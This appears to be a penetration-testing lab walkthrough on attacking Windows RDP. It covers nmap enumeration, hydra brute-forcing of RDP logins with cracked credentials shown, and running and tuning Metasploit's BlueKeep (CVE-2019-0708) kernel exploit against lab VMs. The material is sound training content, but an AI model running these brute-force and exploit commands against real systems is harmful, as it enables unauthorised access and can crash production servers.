🔬RDP
Lab 1
🔬 Windows: Insecure RDP Service
Target IP:
10.4.18.131
RDP exploitation
Dictionaries to use:
/usr/share/metasploit-framework/data/wordlists/common_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
Enumeration
ping 10.4.18.131
nmap -sV 10.4.18.131
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3333/tcp open ssl/dec-notes?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Use Metasploit rdp_scanner module to check if port
3333
is running RDP.
msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS 10.4.18.131
set RPORT 3333
run

📌 The RDP is exposed on target port
3333
, and not on the default port3389
.
RDP Brute-force
Try
hydra
to find valid username and password
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.4.18.131 -s 3333
[3333][rdp] host: 10.4.18.131 login: sysadmin password: samantha
[3333][rdp] host: 10.4.18.131 login: demo password: victoria
[3333][rdp] host: 10.4.18.131 login: auditor password: elizabeth
[3333][rdp] host: 10.4.18.131 login: administrator password: qwertyuiop

freerdp
cannot be used in this labUse
xfreerdp
to connect to target via RDP
xfreerdp /u:administrator /p:qwertyuiop /v:10.4.18.131:3333

Lab 2 - BlueKeep (Extra)
🔬 Home Lab
I have prepared a vulnerable Windows 2008 R2 Virtual Machine and connected it to the same network of the Kali virtual machine. On the server, I have activated
RDP
service on default port3389
.
Host system:
Kali Linux
Target system:
Windown Server 2008 R2
- IP192.168.31.131
-Administrator
:Eternal17010
Exploitation tool:
Vulnerability: CVE-2019-0708 - BlueKeep
❗ Targeting Kernel space memory and apps can cause system crashes.
The attacker can remotely execute arbitrary code by gaining access to a chunk of kernel memory, without authentication.
BlueKeep PoC's (Proof of Concepts) and exploits could be malicious in nature, use only verified exploit code and modules.

Target RDP activated:

Enumeration
nmap -sV -sC 192.168.31.131

📌 RDP Port
3389
is open
Exploitation
msfconsole
search bluekeep
use 0 # Module auxiliary/scanner/rdp/cve_2019_0708_bluekeep ID
set RHOSTS 192.168.31.131
exploit

search bluekeep
use 1 # Module exploit/windows/rdp/cve_2019_0708_bluekeep_rce ID
set RHOSTS 192.168.31.131
show targets
set target 5
exploit



❗ Kernel CRASH can be caused by this exploit, so pay attention on production environment ❗
Adjusting the exploit
To make the exploit work, I've used the Pentest-Tools blog on BlueKeep and Alexandre Vieira blog post.
On WinServer2008 target, open
regedit
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
Set
fDisableCam
reg key on0

Finding the NPP
To make the exploit work, it needs the correct GROOMBASE value which is the start address of the Non Paged Pool area (NPP).
The NPP address can be extracted from a memory dump of the target machine.
In VMWare, take a snapshot of the target virtual machine (Win Server 2008 R2).
Download the vmss2core tool
From the VM (virtual machine) folder copy the
.vmem
and.vmsn
files to thevmss2core
tool folderRun the tool to generate a
memory.dmp
file
.\vmss2core-sb-8456865.exe -W "WinSrv_2008_R2_x64-Snapshot1.vmsn" "WinSrv_2008_R2_x64-Snapshot1.vmem"
Run WinDbg and open the
memory.dmp
fileRun
!polfind a
to get a messageThat is the start of address of Non Page Pool, in this case
fffffa8018c08000

Edit the exploit and set the
GROOMBASE
variable if not already set.In my case it is already set as the above address, for the
2008 R2 (6.1.7601 x64 - VMWare 15.1)
target number5
.

Save the exploit file and run
reload_all
in the Metasploit interface.Set the GROOMSIZE to 50.
msfconsole
search bluekeep
use 1 # Module exploit/windows/rdp/cve_2019_0708_bluekeep_rce ID
set RHOSTS 192.168.31.131
show targets
set target 5
set GROOMSIZE 50
exploit

Lab 3 (Extra)
Windows RDP: Dictionary Attack
Target IP:
10.4.22.41
RDP exploitation
Dictionaries to use:
/usr/share/metasploit-framework/data/wordlists/common_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
nmap 10.10.4.22.41
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.4.22.41 -s 3389

xfreerdp /u:administrator /p:bubbles /v:10.4.22.41
# default port is 3389
Last updated
Was this helpful?